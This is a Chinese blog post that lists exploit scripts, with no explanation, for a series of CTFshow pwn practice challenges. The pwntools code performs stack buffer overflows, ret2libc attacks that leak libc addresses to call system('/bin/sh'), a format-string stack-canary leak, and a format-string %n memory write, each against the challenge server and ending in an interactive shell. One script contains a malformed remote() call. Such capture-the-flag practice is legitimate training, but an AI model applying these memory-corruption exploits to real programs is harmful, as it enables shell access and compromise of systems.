CTFshow——Pwn(1)

CTFshow——Pwn(1)

有点懒不想写write up了。只有exploit。

PWN签到题

from pwn import *
p = remote('xxx',xxx)
p.interactive()

pwn02

from pwn import *
p =remote("pwn.chall.ctf.show",28006)
p.sendline('a'*(0x9+4) + p32(0x0804850F))
p.interactive()

pwn03

from pwn import *
from LibcSearcher import *
p = remote("pwn.chall.ctf.show",28063)
elf = ELF('./stack1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x080484DF
payload = 'a' * (9 + 4) + p32(puts_plt) + p32(main) + p32(puts_got)
p.recv()
p.sendline(payload)
puts_addr = u32(p.recv(4))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

payload = 'a' * (9 + 4) + p32(system) + p32(main) + p32(binsh)
p.recv()
p.sendline(payload)
p.interactive()

pwn04

from pwn import *
#p = process('./ex2')
p =remote("pwn.chall.ctf.show",28190)
p.recv()
leak_canary = "%31$x"
p.sendline(leak_canary)
canary = int(p.recv(),16)
print(hex(canary))
getshell = "a" * 100 + p32(canary) + "b" * 12 + p32(0x0804859B)
p.sendline(getshell)
p.interactive()

pwn05

from pwn import *
p = remote("pwn.chall.ctf.show",28041)
flag = 0x08048486
payload = 'a' * (0x14 + 4) + p32(flag)
p.sendline(payload)
p.interactive()

pwn06

glibc2.27版本以上需要栈平衡。rsp % 0x10 == 0.所以加了一个ret保证堆栈平衡。

from pwn import *
#p =remote("pwn.chall.ctf.show",28012)
p = remote('./pwn (1)')
gdb.attach(p, 'b *0x00000000004005B4')
payload = 'a' * (0xc + 8) + p64(0x0400577) + p64(0x0400577)
p.sendline(payload)
p.interactive()

pwn07

from pwn import *
from LibcSearcher import *
elf = ELF('./pwn')
p = remote('pwn.chall.ctf.show',28081)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x00000000004006e3
ret = 0x00000000004004c6
payload = 'a' * (0xc + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)

p.sendline(payload)
p.recvline()
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\0'))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

payload = 'a' * (0xc + 0x8) + p64(ret) +p64(pop_rdi) + p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()

01栈溢出之ret2text

from pwn import *
p =remote('pwn.chall.ctf.show',28135)
ret = 0x00000000004004fe
payload = 'a' * (0x80 + 8) + p64(ret) +p64(0x000000000400637)
p.sendline(payload)
p.interactive()

pwn10

from pwn import *
p = remote('pwn.chall.ctf.show',28120)
num_addr = 0x0804A030
payload = p32(num_addr) + '%12c%7$n'
p.sendline(payload)
p.interactive()

2a1

# 20.21.2.24还没搞出来。hhhh明天再看看有点困啊
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值